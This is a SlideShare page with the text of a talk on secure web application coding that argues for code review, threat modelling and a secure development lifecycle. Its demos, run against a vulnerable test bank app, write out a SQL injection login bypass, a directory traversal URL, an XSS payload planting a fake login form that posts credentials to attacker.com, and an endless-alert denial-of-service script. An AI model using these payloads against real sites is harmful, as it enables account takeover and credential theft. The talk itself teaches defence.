SlideShare a Scribd company logo
Do you write
             secure code?


                      Erez Metula, CISSP
               Application Security Consultant & Trainer

                       ErezMetula@gmail.com




                          Agenda

•   What is application security
•   What are application level vulnerabilities
•   Demos
•   Security procedures
•   How to improve the development lifecycle
Growing concern




        What is Application Security?


• It is not about network Security !!!
   • It’s not about Firewalls, Intrusion Detection Systems,
       It’
       Operating System Hardening, Database Hardening, etc.
   • Network Security Mostly Ignores the Contents of HTTP
       Traffic
   • Common myth – “We have a firewall !“   !“

• It is about:
   • Securing the code that drives a web application
   • Securing backend systems – web server, DB, etc..
   • Securing the users !!!
Application Security Is A Different
                  World
• Network Security         • Application Security
   • Part of IT               • Part of Business Units
   • Networking Experts       • Software Experts
   • Product Focused          • Custom Code Focused
   • 1000’s of Copies         • 1 Copy of Software
   • Signature Based          • No Signatures
   • Patch Management         • Prevent Vulnerabilities



    We can’t rely on network security techniques to
                gain application security




          Application security layer
OWASP Top 10 (2010)




                 DEMO – SQL Injection
Developer concate SQL statements
 string sql = "select * from Users where
          user ='" + User.Text + "'
          and pwd='" + Password.Text + "'"
               pwd='"

Hacker types: ‘ or 1=1 --
 string sql = "select * from Users where a
          user =' ' or 1=1 --' and pwd=''"
                           --'     pwd=''"

Result - the first database entry (might be the Admin!)

http://www.victim.com/HacmeBank_v2_Website/aspx/Login.aspx
A little bit of humor..




          DEMO – Directory traversal
• The following demo shows an innocent looking
  page, letting the user to download a requested
  file from the base dir.

• Legitimate use:
• http://www.victim.com/SendPdf/WebForm1.aspx?file=somefile.pdf


• But the user can get out of the base directory..
• http://www.victim.com/SendPdf/WebForm1.aspx?
  file=../../progs/secret/SecretFile.pdf
DEMO - Cross-Site Scripting (XSS)
• Web browsers execute code sent from websites
   • HTML
   • Javascript
   • Flash, etc.
• send malicious code to other users
• the attacker is using the website to forward an attack!
http://www.victim.com/xss/xss.asp?username=david
http://www.victim.com/xss/xss.asp?username=


http://www.victim.com/xss/xss.asp?username=<br>please login:<form
http://www.victim.com/xss/xss.asp?username=<br>please
    action="http://www.attacker.com" name=a
    action="http://www.attacker.com"
    method="post">username:<br><input type=text
    method="post">username:<br><input
    name=b><br>password:<br><input type=password
    name=b><br>password:<br><input
    name=c><br><input class=w type=submit value="login"></form>
    name=c><br><input




   Demo – Denial of Service using XSS

 • Prevent legitimate users from using the hacmebank site
   (while true injection)
    <script>while(true){alert("service unavailable");}</script>
    <script>while(true){alert("service

 • Such a short line can cause so much damage..!!!



 • Other possibilities
    • Delete a specific user (competent?)
    • Change password for a specific user
    • Delete all the tables/database…
                     tables/database…
    • Format the server HD
Business logic attacks
• Flaws that allow a user to do something that isn't allowed by the
  business.
   • Cannot be detected by a vulnerability scanner
   • One of the hardest to detect
   • Specific to the application being tested.

• Some examples
   • Negative amount of money
   • Skipping security checks
   • Performing operations in different order

• DEMO
   • Withdraw becomes a deposit
   • Casino




    Cross Site Request Forgery (CSRF)
• Another client side attack
   • Resembles XSS, but quite different
• The victim’s browser is tricked into issuing a command to a
  vulnerable web application
• The browser outgoing request automatically include user’s
  data (session id, authentication tickets, ip address, etc.)
• Impact
   • Perform transactions on behalf of the user
   • Access private networks
   • Access sensitive data
   • Modify user’s data
CSRF Illustrated
      Attacker sets the trap on some website on the internet
1
          (or simply via an e-mail)



                                                      Application with CSRF
                    Hidden <img> tag                  vulnerability
                    contains attack against
                    vulnerable site




                                                                                    Communication
                                                                   Administration




                                                                                    Bus. Functions
                                                                                    E-Commerce
                                                                   Transactions

                                                                                    Knowledge
                                                        Accounts
                                                        Finance




                                                                                    Mgmt
     While logged into vulnerable site,
2      victim views attacker site
                                                         Custom Code


                                                            3
                                                        Vulnerable site sees
                 <img> tag loaded by                    legitimate request from
                 browser – sends GET                    victim and performs the
                 request (including                     action requested
                 credentials) to vulnerable
                 site




    CSRF via phishing e-mail




                   Unusual activity.msg
CSRF via malicious web site
• You visit a malicious web site
• The web site instructs your browser to submit a request
  to some CSRF vulnerable page on the victim application
• Your browser perform the operation
   • IE7 / Mozilla – at least an open tab
   • IE6 – from the same window

• Example:
• http://www.attacker.com/csrf/InnocentSite.asp
  http://www. attacker. com/ csrf/ InnocentSite.




                       What to do?
• In order to avoid application level threats, we usually perform
   • Penetration testing
   • Code review
   • Threat modeling
   • SDL – Secure Development Lifecycle
Penetration Testing
• Testing the security of systems and architectures from a
  hacker’s point of view
  hacker’
• Blackbox approach - A “simulated attack”
                                    attack”

• Identifying weaknesses in already deployed targets, for
  example, platform tests include:
   • Information disclosure
   • Escalation of privileges to valid users
   • Denial of service
   • Unauthorized access

• Penetration testing is usually done when development
  completes




           Problem - Cost of change
Code review
• Security Code review is a process to improve software
  security by reviewing it “from the inside”
                                     inside”
• Whitebox approach
• This process should be performed by the developer and
  by a 3rd party security personnel
• The main objective is to
   • Detect vulnerabilities in code
   • Identify bad application level configuration
   • Detect backdoors




             The Threat Modeling

                  Threat Modeling Process

             1 Identify Assets

             2 Create an Architecture Overview

             3 Decompose the Application

             4 Identify the Threats

             5 Document the Threats

             6 Rate the Threats
We need secure development
                     methodologies
• Current development methodologies lack security
  procedures
• Security should be performed from the initial project stages
• Security should be embedded into the development lifecycle
• SDL – Secure Development Lifecycle




                        SDL
  “Integrate” Security within Application Life Cycle
    Security      Threat Modeling   Code     Penetration     Secure
  Requirements    / Secure Design   Review     Testing     Deployment




Requirements        Design          Code       Test        Deploy
Use Cases
Don’t rely on only one countermeasure ….




                         Summary
• Application security is different from other security layers
• Traditional security products (firewall, antivirus, IPS, SSL,
  etc.) does not help to mitigate application threats.
• You should perform application security by doing
   • Code review
   • Application penetration test
   • Design review
   • Integrate security into the development cycle
       • Example – SDL (secure Development Lifecyce)
                                                   Lifecyce)
Questions ?




Thank you !

ErezMetula@gmail.com

More Related Content

What's hot (20)

PDF
Android Security Overview and Safe Practices for Web-Based Android Applications
h4oxer
 
PPTX
Defending Web Applications: first-principles- Jason Lam
OWASP-Qatar Chapter
 
PDF
Mobile application security – effective methodology, efficient testing! hem...
owaspindia
 
PDF
Security Testing Mobile Applications
Denim Group
 
PDF
Смирнов Александр, Security in Android Application
SECON
 
PPT
Mobile Application Security – Effective methodology, efficient testing!
espheresecurity
 
PDF
Brief Tour about Android Security
National Cheng Kung University
 
PDF
Web Security: A Primer for Developers
Mike North
 
ODP
Mobile Apps Security Testing -1
Krisshhna Daasaarii
 
PPTX
Web and Mobile Application Security
Prateek Jain
 
PDF
Securing Android
Marakana Inc.
 
PDF
Crash Course In Brain Surgery
morisson
 
PDF
Web Security - Introduction v.1.3
Oles Seheda
 
PDF
Analysis of web application worms and viruses
UltraUploader
 
PDF
ISACA CACS 2012 - Mobile Device Security and Privacy
Michael Davis
 
PPT
Phishing with Super Bait
Jeremiah Grossman
 
PDF
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
Aditya K Sood
 
PDF
Csrf
samtpru
 
PPT
Operation High Roller: The need for a security ally!
Jeff Danielson
 
PPTX
Combat Passwords on Post-Its with Multi-Factor Authentication for IBM i
Precisely
 
Android Security Overview and Safe Practices for Web-Based Android Applications
h4oxer
 
Defending Web Applications: first-principles- Jason Lam
OWASP-Qatar Chapter
 
Mobile application security – effective methodology, efficient testing! hem...
owaspindia
 
Security Testing Mobile Applications
Denim Group
 
Смирнов Александр, Security in Android Application
SECON
 
Mobile Application Security – Effective methodology, efficient testing!
espheresecurity
 
Brief Tour about Android Security
National Cheng Kung University
 
Web Security: A Primer for Developers
Mike North
 
Mobile Apps Security Testing -1
Krisshhna Daasaarii
 
Web and Mobile Application Security
Prateek Jain
 
Securing Android
Marakana Inc.
 
Crash Course In Brain Surgery
morisson
 
Web Security - Introduction v.1.3
Oles Seheda
 
Analysis of web application worms and viruses
UltraUploader
 
ISACA CACS 2012 - Mobile Device Security and Privacy
Michael Davis
 
Phishing with Super Bait
Jeremiah Grossman
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
Aditya K Sood
 
Csrf
samtpru
 
Operation High Roller: The need for a security ally!
Jeff Danielson
 
Combat Passwords on Post-Its with Multi-Factor Authentication for IBM i
Precisely
 

Viewers also liked (7)

PPS
Afik Gal @alphageeks: Flex Intro
Alphageeks
 
PPTX
Refael Ackermann @alphageeks on HTML5
Alphageeks
 
PDF
Alphageeks #4: Example Embedding By Ohad Barzilay
Alphageeks
 
PPTX
Shayke's SCRUM @alphageeks 6
Alphageeks
 
PDF
The secrets of developer happiness - Yuval Goldstein @ alphageeks 5
Alphageeks
 
PDF
Pertemuan14
Muhammad Ramdani
 
PDF
The Scrum Roles presented by the Scrumlies 2009
borisgloger consulting GmbH
 
Afik Gal @alphageeks: Flex Intro
Alphageeks
 
Refael Ackermann @alphageeks on HTML5
Alphageeks
 
Alphageeks #4: Example Embedding By Ohad Barzilay
Alphageeks
 
Shayke's SCRUM @alphageeks 6
Alphageeks
 
The secrets of developer happiness - Yuval Goldstein @ alphageeks 5
Alphageeks
 
Pertemuan14
Muhammad Ramdani
 
The Scrum Roles presented by the Scrumlies 2009
borisgloger consulting GmbH
 
Ad

Similar to Do You Write Secure Code? by Erez Metula (20)

PPTX
WEB APPLICATION SECURITY
yashwanthlavu
 
PDF
How to Stop Man in the Browser Attacks
Imperva
 
PDF
Secure coding guidelines
Zakaria SMAHI
 
PPTX
Exploitation techniques and fuzzing
Prachi Gulihar
 
PDF
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 
PPT
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
 
PPT
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
PPTX
Best practices to secure Windows10 with already included features
Alexander Benoit
 
PPTX
WEB APPLICATION SECURITY
yashwanthlavu
 
PPTX
Vulnerabilities in modern web applications
Niyas Nazar
 
PPT
Isys20261 lecture 09
Wiliam Ferraciolli
 
KEY
EISA Considerations for Web Application Security
Larry Ball
 
PDF
Threat_Modelling.pdf
MarlboroAbyad
 
PPTX
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
PPTX
Security testing
Khizra Sammad
 
PPTX
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
PPTX
Uncover What's Inside the Mind of a Hacker
IBM Security
 
PPTX
Protection from hacking attacks
Sugirtha Jasmine M
 
PPTX
Botnets Attacks.pptx
MuhammadRehan856177
 
PDF
Web security 2012
Mohamed Elabnody
 
WEB APPLICATION SECURITY
yashwanthlavu
 
How to Stop Man in the Browser Attacks
Imperva
 
Secure coding guidelines
Zakaria SMAHI
 
Exploitation techniques and fuzzing
Prachi Gulihar
 
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
 
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Best practices to secure Windows10 with already included features
Alexander Benoit
 
WEB APPLICATION SECURITY
yashwanthlavu
 
Vulnerabilities in modern web applications
Niyas Nazar
 
Isys20261 lecture 09
Wiliam Ferraciolli
 
EISA Considerations for Web Application Security
Larry Ball
 
Threat_Modelling.pdf
MarlboroAbyad
 
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Security testing
Khizra Sammad
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
Uncover What's Inside the Mind of a Hacker
IBM Security
 
Protection from hacking attacks
Sugirtha Jasmine M
 
Botnets Attacks.pptx
MuhammadRehan856177
 
Web security 2012
Mohamed Elabnody
 
Ad

Recently uploaded (20)

PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PPTX
cloud computing vai.pptx for the project
vaibhavdobariyal79
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PDF
Per Axbom: The spectacular lies of maps
Nexer Digital
 
PPTX
Agentic AI in Healthcare Driving the Next Wave of Digital Transformation
danielle hunter
 
PPTX
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
PPTX
Simple and concise overview about Quantum computing..pptx
mughal641
 
PDF
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
PDF
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
PPTX
Agile Chennai 18-19 July 2025 | Workshop - Enhancing Agile Collaboration with...
AgileNetwork
 
PPTX
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
PDF
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
PDF
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
PPTX
AVL ( audio, visuals or led ), technology.
Rajeshwri Panchal
 
PDF
MASTERDECK GRAPHSUMMIT SYDNEY (Public).pdf
Neo4j
 
PPTX
The Future of AI & Machine Learning.pptx
pritsen4700
 
PPTX
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
cloud computing vai.pptx for the project
vaibhavdobariyal79
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
Per Axbom: The spectacular lies of maps
Nexer Digital
 
Agentic AI in Healthcare Driving the Next Wave of Digital Transformation
danielle hunter
 
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
Simple and concise overview about Quantum computing..pptx
mughal641
 
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
Agile Chennai 18-19 July 2025 | Workshop - Enhancing Agile Collaboration with...
AgileNetwork
 
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
AVL ( audio, visuals or led ), technology.
Rajeshwri Panchal
 
MASTERDECK GRAPHSUMMIT SYDNEY (Public).pdf
Neo4j
 
The Future of AI & Machine Learning.pptx
pritsen4700
 
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 

Do You Write Secure Code? by Erez Metula

  • 1. Do you write secure code? Erez Metula, CISSP Application Security Consultant & Trainer [email protected] Agenda • What is application security • What are application level vulnerabilities • Demos • Security procedures • How to improve the development lifecycle
  • 2. Growing concern What is Application Security? • It is not about network Security !!! • It’s not about Firewalls, Intrusion Detection Systems, It’ Operating System Hardening, Database Hardening, etc. • Network Security Mostly Ignores the Contents of HTTP Traffic • Common myth – “We have a firewall !“ !“ • It is about: • Securing the code that drives a web application • Securing backend systems – web server, DB, etc.. • Securing the users !!!
  • 3. Application Security Is A Different World • Network Security • Application Security • Part of IT • Part of Business Units • Networking Experts • Software Experts • Product Focused • Custom Code Focused • 1000’s of Copies • 1 Copy of Software • Signature Based • No Signatures • Patch Management • Prevent Vulnerabilities We can’t rely on network security techniques to gain application security Application security layer
  • 4. OWASP Top 10 (2010) DEMO – SQL Injection Developer concate SQL statements string sql = "select * from Users where user ='" + User.Text + "' and pwd='" + Password.Text + "'" pwd='" Hacker types: ‘ or 1=1 -- string sql = "select * from Users where a user =' ' or 1=1 --' and pwd=''" --' pwd=''" Result - the first database entry (might be the Admin!) http://www.victim.com/HacmeBank_v2_Website/aspx/Login.aspx
  • 5. A little bit of humor.. DEMO – Directory traversal • The following demo shows an innocent looking page, letting the user to download a requested file from the base dir. • Legitimate use: • http://www.victim.com/SendPdf/WebForm1.aspx?file=somefile.pdf • But the user can get out of the base directory.. • http://www.victim.com/SendPdf/WebForm1.aspx? file=../../progs/secret/SecretFile.pdf
  • 6. DEMO - Cross-Site Scripting (XSS) • Web browsers execute code sent from websites • HTML • Javascript • Flash, etc. • send malicious code to other users • the attacker is using the website to forward an attack! http://www.victim.com/xss/xss.asp?username=david http://www.victim.com/xss/xss.asp?username= http://www.victim.com/xss/xss.asp?username=<br>please login:<form http://www.victim.com/xss/xss.asp?username=<br>please action="http://www.attacker.com" name=a action="http://www.attacker.com" method="post">username:<br><input type=text method="post">username:<br><input name=b><br>password:<br><input type=password name=b><br>password:<br><input name=c><br><input class=w type=submit value="login"></form> name=c><br><input Demo – Denial of Service using XSS • Prevent legitimate users from using the hacmebank site (while true injection) <script>while(true){alert("service unavailable");}</script> <script>while(true){alert("service • Such a short line can cause so much damage..!!! • Other possibilities • Delete a specific user (competent?) • Change password for a specific user • Delete all the tables/database… tables/database… • Format the server HD
  • 7. Business logic attacks • Flaws that allow a user to do something that isn't allowed by the business. • Cannot be detected by a vulnerability scanner • One of the hardest to detect • Specific to the application being tested. • Some examples • Negative amount of money • Skipping security checks • Performing operations in different order • DEMO • Withdraw becomes a deposit • Casino Cross Site Request Forgery (CSRF) • Another client side attack • Resembles XSS, but quite different • The victim’s browser is tricked into issuing a command to a vulnerable web application • The browser outgoing request automatically include user’s data (session id, authentication tickets, ip address, etc.) • Impact • Perform transactions on behalf of the user • Access private networks • Access sensitive data • Modify user’s data
  • 8. CSRF Illustrated Attacker sets the trap on some website on the internet 1 (or simply via an e-mail) Application with CSRF Hidden <img> tag vulnerability contains attack against vulnerable site Communication Administration Bus. Functions E-Commerce Transactions Knowledge Accounts Finance Mgmt While logged into vulnerable site, 2 victim views attacker site Custom Code 3 Vulnerable site sees <img> tag loaded by legitimate request from browser – sends GET victim and performs the request (including action requested credentials) to vulnerable site CSRF via phishing e-mail Unusual activity.msg
  • 9. CSRF via malicious web site • You visit a malicious web site • The web site instructs your browser to submit a request to some CSRF vulnerable page on the victim application • Your browser perform the operation • IE7 / Mozilla – at least an open tab • IE6 – from the same window • Example: • http://www.attacker.com/csrf/InnocentSite.asp http://www. attacker. com/ csrf/ InnocentSite. What to do? • In order to avoid application level threats, we usually perform • Penetration testing • Code review • Threat modeling • SDL – Secure Development Lifecycle
  • 10. Penetration Testing • Testing the security of systems and architectures from a hacker’s point of view hacker’ • Blackbox approach - A “simulated attack” attack” • Identifying weaknesses in already deployed targets, for example, platform tests include: • Information disclosure • Escalation of privileges to valid users • Denial of service • Unauthorized access • Penetration testing is usually done when development completes Problem - Cost of change
  • 11. Code review • Security Code review is a process to improve software security by reviewing it “from the inside” inside” • Whitebox approach • This process should be performed by the developer and by a 3rd party security personnel • The main objective is to • Detect vulnerabilities in code • Identify bad application level configuration • Detect backdoors The Threat Modeling Threat Modeling Process 1 Identify Assets 2 Create an Architecture Overview 3 Decompose the Application 4 Identify the Threats 5 Document the Threats 6 Rate the Threats
  • 12. We need secure development methodologies • Current development methodologies lack security procedures • Security should be performed from the initial project stages • Security should be embedded into the development lifecycle • SDL – Secure Development Lifecycle SDL “Integrate” Security within Application Life Cycle Security Threat Modeling Code Penetration Secure Requirements / Secure Design Review Testing Deployment Requirements Design Code Test Deploy Use Cases
  • 13. Don’t rely on only one countermeasure …. Summary • Application security is different from other security layers • Traditional security products (firewall, antivirus, IPS, SSL, etc.) does not help to mitigate application threats. • You should perform application security by doing • Code review • Application penetration test • Design review • Integrate security into the development cycle • Example – SDL (secure Development Lifecyce) Lifecyce)